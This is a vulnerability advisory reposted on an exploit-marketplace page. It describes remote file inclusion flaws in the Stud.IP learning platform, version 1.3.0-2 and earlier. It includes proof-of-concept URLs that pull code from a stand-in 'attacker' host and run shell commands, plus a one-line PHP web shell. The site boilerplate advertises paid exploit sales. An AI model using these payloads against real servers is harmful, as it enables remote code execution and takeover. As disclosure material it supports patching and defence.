0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities
=============================================================== Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities =============================================================== /*------------------------------------------------ IHS Public advisory -------------------------------------------------*/ Stud.IP Remote File Inclusion Stud.IP is a learning and an information management system for universities, educational facilities and enterprises. http://www.studip.de http://www.data-quest.de http://www.sourceforge.net/projects/studip Discovered by Hamid Ebadi Credit : all go to IHS team (IHS : IRAN HOMELAND SECURITY) www.ihsteam.com (persian) www.ihsteam.net (english) The original article can be found at: http://www.hamid.ir/security/ http://www.IHSteam.com Vulnerable Systems: studip 1.3.0-2 and below Input passed to the "_PHPLIB[libdir]" parameter in studip-phplib/oohforms.inc and to the "ABSOLUTE_PATH_STUDIP" parameter in studip-htdocs/archiv_assi.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. POC Exploits: The following URL will cause the server to include external files http://localhost/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://attacker/cmd.gif? http://localhost/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://attacker/cmd.gif? cmd.gif <? passthru($_GET['cmd']); ?> Solution: Edit the source code to ensure that input is properly verified. greeting : LorD , NT , C0d3r of IHS # 0day.today [2024-11-15] #